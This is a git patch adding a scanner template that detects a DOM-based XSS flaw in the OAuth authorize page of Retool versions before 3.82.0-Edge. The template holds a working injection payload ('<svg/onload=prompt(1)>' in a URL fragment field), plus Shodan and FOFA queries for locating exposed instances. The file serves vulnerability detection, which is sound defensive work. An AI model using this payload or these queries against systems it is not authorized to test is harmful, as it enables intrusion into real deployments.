From d4d0912553bba23b45fc519af8bac4441c0f072e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 6 Sep 2024 00:01:12 +0530
Subject: [PATCH] Create retool-dom-xss.yaml

---
 .../retool/retool-dom-xss.yaml                | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 headless/vulnerabilities/retool/retool-dom-xss.yaml

diff --git a/headless/vulnerabilities/retool/retool-dom-xss.yaml b/headless/vulnerabilities/retool/retool-dom-xss.yaml
new file mode 100644
index 0000000000..afeda8dea8
--- /dev/null
+++ b/headless/vulnerabilities/retool/retool-dom-xss.yaml
@@ -0,0 +1,35 @@
+id: retool-dom-xss
+
+info:
+  name: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS
+  author: rootxharsh,iamnoooob,pdresearch
+  severity: high
+  description: |
+    Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"Retool"
+    fofa-query: body="Retool"
+  tags: headless,retool,dom,xss
+
+headless:
+  - steps:
+      - args:
+          url: '{{BaseURL}}/oauth/authorize#%7B%20"redirectUri":%20"zzz",%20"resourceId":%20"fff",%20"resourceName":%20"aa",%20"resourceType":%20"azz",%20"userEmail":%20"aaa@aa.com",%20"userFirstName":%20"zzz",%20"userLastName":%20"zzff",%20"xsrfToken":%20"x","subdomain":"aaa<svg/onload=prompt(1)>aaaa","accessToken":"ab"%20%7D'
+        action: navigate
+
+      - action: waitdialog
+        name: subdomain_object_dom
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - subdomain_object_dom == true
+
+      - type: word
+        part: body
+        words:
+          - "retool"
+        case-insensitive: true